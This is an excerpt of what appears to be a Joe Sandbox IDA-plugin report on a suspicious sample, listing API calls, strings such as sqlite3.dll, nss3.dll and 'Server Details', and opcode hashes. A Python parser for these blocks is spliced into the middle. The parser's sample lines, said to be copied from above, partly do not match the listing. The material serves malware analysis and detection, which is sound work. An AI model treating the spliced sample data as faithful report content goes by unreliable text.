                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                              • String ID: recovered %d pages from %s
                                                                                                              • API String ID: 985450955-1623757624
                                                                                                              • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                              • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                                              • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                              • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _ultoasprintf
                                                                                                              • String ID: %s %s %s
                                                                                                              • API String ID: 432394123-3850900253
                                                                                                              • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                              • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                              • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                              • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                              APIs
                                                                                                              • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                              • sprintf.MSVCRT ref: 0040909B
                                                                                                                • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                              • String ID: menu_%d
                                                                                                              • API String ID: 1129539653-2417748251
                                                                                                              • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                              • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                              • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                              • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                              APIs
                                                                                                              • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                              • _mbscat.MSVCRT ref: 004070FA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _mbscat$_mbscpystrlen
                                                                                                              • String ID: sqlite3.dll
                                                                                                              • API String ID: 1983510840-1155512374
                                                                                                              • Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                              • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                              • Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                              • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
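The function blocks in this listing (APIs, Strings, Memory Dump Source, Similarity) are Joe Sandbox IDA-plugin output. The parser below turns them into records that can be indexed by imported API or searched for a string such as sqlite3.dll, so that call sites and Opcode IDs can be pulled out of the report for pivoting. It is an added example, not Joe Sandbox's own code; the two sample entries are copied from the blocks above (trimmed to the fields the parser reads), the field names come from the listing, and the class and function names are the example's own.

```python
"""Parse Joe Sandbox 'IDA Plugin' function blocks into searchable records (added example)."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Two entries copied from the listing above, trimmed to the fields the parser
# reads; constructed test input, not a live report fetch.
SAMPLE = """\
APIs
• Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
Strings
• recovered %d pages from %s, xrefs: 004188B4
Memory Dump Source
• Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
• API String ID: 985450955-1623757624
• Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
APIs
• _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
• Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
• _mbscat.MSVCRT ref: 004070FA
Strings
Similarity
• API ID: _mbscat$_mbscpystrlen
• String ID: sqlite3.dll
• API String ID: 1983510840-1155512374
• Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• [Part of subcall function ADDR: ]name.MODULE[(args)][,] ref: ADDR"
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[^.(\s]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")
STRING_LINE = re.compile(r"^•\s*(?P<text>.*), xrefs: (?P<ref>[0-9A-Fa-f]{8})\s*$")
KV_LINE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: str                            # call site in the dumped image
    via_subcall: Optional[str] = None   # callee address when reached indirectly

@dataclass
class FunctionEntry:
    api_calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)     # (text, xref address)
    similarity: dict = field(default_factory=dict)  # API ID, Opcode ID, ...
    source: dict = field(default_factory=dict)      # Source File, Snapshot File

    def direct_refs(self) -> list:
        """Call sites inside this function itself, excluding subcall references."""
        return [c.ref for c in self.api_calls if c.via_subcall is None]

def parse_entries(text: str) -> list:
    entries, section, cur = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":          # every function block starts with APIs
                cur = FunctionEntry()
                entries.append(cur)
            section = line
        elif cur is None or not line.startswith("•"):
            continue
        elif section == "APIs":
            m = API_LINE.match(line)
            if m:
                args = tuple(a for a in (m["args"] or "").split(",") if a)
                cur.api_calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
        elif section == "Strings":
            m = STRING_LINE.match(line)
            if m:
                cur.strings.append((m["text"], m["ref"]))
        else:
            m = KV_LINE.match(line)
            if m:
                target = cur.similarity if section == "Similarity" else cur.source
                target[m["key"]] = m["value"]
    return entries

def index_by_api(entries: list) -> dict:
    """Map 'name.MODULE' to the sorted call-site addresses that reference it."""
    idx = {}
    for e in entries:
        for c in e.api_calls:
            idx.setdefault(f"{c.name}.{c.module}", []).append(c.ref)
    return {k: sorted(v) for k, v in idx.items()}

def find_entries_mentioning(entries: list, needle: str) -> list:
    """Entries whose strings or call arguments contain needle (case-insensitive)."""
    n = needle.lower()
    return [e for e in entries
            if any(n in t.lower() for t, _ in e.strings)
            or any(n in a.lower() for c in e.api_calls for a in c.args)]
```

Subcall references ("Part of subcall function ...") are kept but marked, so `direct_refs()` gives only the call sites that belong to the function whose Opcode ID is listed; that distinction matters when turning an entry into an address list for a debugger breakpoint or a YARA rule scoped to one function.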
                                                                                                              APIs
                                                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                                                                                              • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LongWindow
                                                                                                              • String ID: MZ@
                                                                                                              • API String ID: 1378638983-2978689999
                                                                                                              • Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                              • Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
                                                                                                              • Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                              • Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
                                                                                                              APIs
                                                                                                              • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PrivateProfileString
                                                                                                              • String ID: A4@$Server Details
                                                                                                              • API String ID: 1096422788-4071850762
                                                                                                              • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                              • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                              • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                              • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                              APIs
                                                                                                              • strlen.MSVCRT ref: 0040849A
                                                                                                              • memset.MSVCRT ref: 004084D2
                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,7686EB20,?,00000000), ref: 0040858F
                                                                                                              • LocalFree.KERNEL32(00000000,?,?,?,?,7686EB20,?,00000000), ref: 004085BA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 3110682361-0
                                                                                                              • Opcode ID: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                              • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                              • Opcode Fuzzy Hash: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                              • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                              APIs
                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                              • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 3510742995-0
                                                                                                              • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                              • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                              • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                              • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8